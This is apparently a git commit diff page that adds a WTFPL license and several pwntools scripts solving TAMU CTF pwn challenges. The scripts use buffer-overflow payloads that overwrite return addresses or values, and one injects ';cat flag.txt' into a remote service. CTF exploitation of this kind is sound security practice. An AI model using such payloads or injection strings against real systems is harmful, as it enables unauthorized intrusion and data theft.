Sun, 24 Feb 2019 22:31:06 +0800
parent
b75b6bd464
commit
7728c15b1a
File diff suppressed because it is too large
Load Diff
@ -1,14 +1,14 @@
|
|||||||
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
|
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
|
||||||
|
|
||||||
Version 2, December 2004
|
Version 2, December 2004
|
||||||
|
|
||||||
Copyright (C) 2004 Sam Hocevar <sam@hocevar.net>
|
Copyright (C) 2004 Sam Hocevar <sam@hocevar.net>
|
||||||
|
|
||||||
Everyone is permitted to copy and distribute verbatim or modified copies of
|
Everyone is permitted to copy and distribute verbatim or modified copies of
|
||||||
this license document, and changing it is allowed as long as the name is changed.
|
this license document, and changing it is allowed as long as the name is changed.
|
||||||
|
|
||||||
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
|
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
|
||||||
|
|
||||||
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
||||||
|
|
||||||
0. You just DO WHAT THE FUCK YOU WANT TO.
|
0. You just DO WHAT THE FUCK YOU WANT TO.
|
||||||
|
|||||||
@ -1,5 +1,5 @@
|
|||||||
from pwn import *
|
from pwn import *
|
||||||
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
|
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
|
||||||
p = remote("159.65.68.241", 10003)
|
p = remote("159.65.68.241", 10003)
|
||||||
p.sendline(pld)
|
p.sendline(pld)
|
||||||
p.interactive()
|
p.interactive()
|
||||||
Binary file not shown.
@ -0,0 +1,7 @@
|
|||||||
|
from pwn import *
|
||||||
|
sh = remote("pwn.tamuctf.com", 4321)
|
||||||
|
sh.sendline("Sir Lancelot of Camelot")
|
||||||
|
sh.sendline("To seek the Holy Grail.")
|
||||||
|
pld = 'a' * 43 + p32(0xDEA110C8)
|
||||||
|
sh.sendline(pld)
|
||||||
|
sh.interactive()
|
||||||
Binary file not shown.
@ -0,0 +1,5 @@
|
|||||||
|
from pwn import *
|
||||||
|
sh = remote("pwn.tamuctf.com", 4322)
|
||||||
|
pld = 'a' * +30 + p8(0xd8)
|
||||||
|
sh.sendline(pld)
|
||||||
|
sh.interactive()
|
||||||
Binary file not shown.
@ -0,0 +1,4 @@
|
|||||||
|
from pwn import *
|
||||||
|
sh = remote("pwn.tamuctf.com", 4324)
|
||||||
|
sh.sendline(";cat flag.txt")
|
||||||
|
sh.interactive()
|
||||||
Loading…
Reference in new issue